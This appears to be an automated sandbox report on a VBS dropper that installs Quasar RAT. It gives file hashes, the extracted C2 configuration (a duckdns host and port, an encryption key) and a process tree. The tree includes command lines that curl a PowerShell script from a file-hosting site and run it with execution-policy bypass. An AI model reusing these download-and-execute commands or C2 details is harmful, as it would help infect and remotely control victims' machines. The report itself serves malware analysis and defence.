Analysis

  • max time kernel
    36s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/01/2023, 09:37

General

  • Target

    asd.vbs

  • Size

    484B

  • MD5

    1663574ead24fc758c224a04057e9da3

  • SHA1

    c2fb493d802d82d93cbb139ab3c3899c31a68bc4

  • SHA256

    7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba

  • SHA512

    ab1d8b4e67f5b9772e2a34ce7ab5695f604fc510d255fdad3b12d1a0c2793c2706172d2f84a29e67f239cf951b328fab30e273b1ee383cee2db4add9704f3840

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

ghcc.duckdns.org:4782

Mutex

a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b

Attributes
  • encryption_key

    B0326395AC2D48856CAE22978A087DF5DCF5816D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4956
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4624
      • C:\Windows\system32\cmd.exe
        cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2460
        • C:\Windows\system32\curl.exe
          curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
          PID:628
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2256
        • C:\Windows\system32\cmd.exe
          cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5092
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3384
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1128

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Roaming\rr.ps1

    Filesize

    5.1MB

    MD5

    7aad8bcb11ff3deab23cc311222fe265

    SHA1

    3d9a69c71e00aff947af949441220f18bad9e0d8

    SHA256

    c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a

    SHA512

    f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9

  • memory/1128-141-0x0000000000400000-0x0000000000484000-memory.dmp

    Filesize

    528KB

  • memory/1128-150-0x0000000007820000-0x0000000007886000-memory.dmp

    Filesize

    408KB

  • memory/1128-149-0x0000000006480000-0x0000000006532000-memory.dmp

    Filesize

    712KB

  • memory/1128-148-0x0000000006250000-0x00000000062A0000-memory.dmp

    Filesize

    320KB

  • memory/1128-147-0x0000000006820000-0x0000000006E38000-memory.dmp

    Filesize

    6.1MB

  • memory/1128-145-0x00000000055A0000-0x0000000005632000-memory.dmp

    Filesize

    584KB

  • memory/1128-146-0x0000000005500000-0x000000000550A000-memory.dmp

    Filesize

    40KB

  • memory/1128-144-0x0000000005B50000-0x00000000060F4000-memory.dmp

    Filesize

    5.6MB

  • memory/3384-140-0x00007FFC46E80000-0x00007FFC47941000-memory.dmp

    Filesize

    10.8MB

  • memory/3384-143-0x00007FFC46E80000-0x00007FFC47941000-memory.dmp

    Filesize

    10.8MB

  • memory/3384-138-0x0000019ECFD30000-0x0000019ECFD52000-memory.dmp

    Filesize

    136KB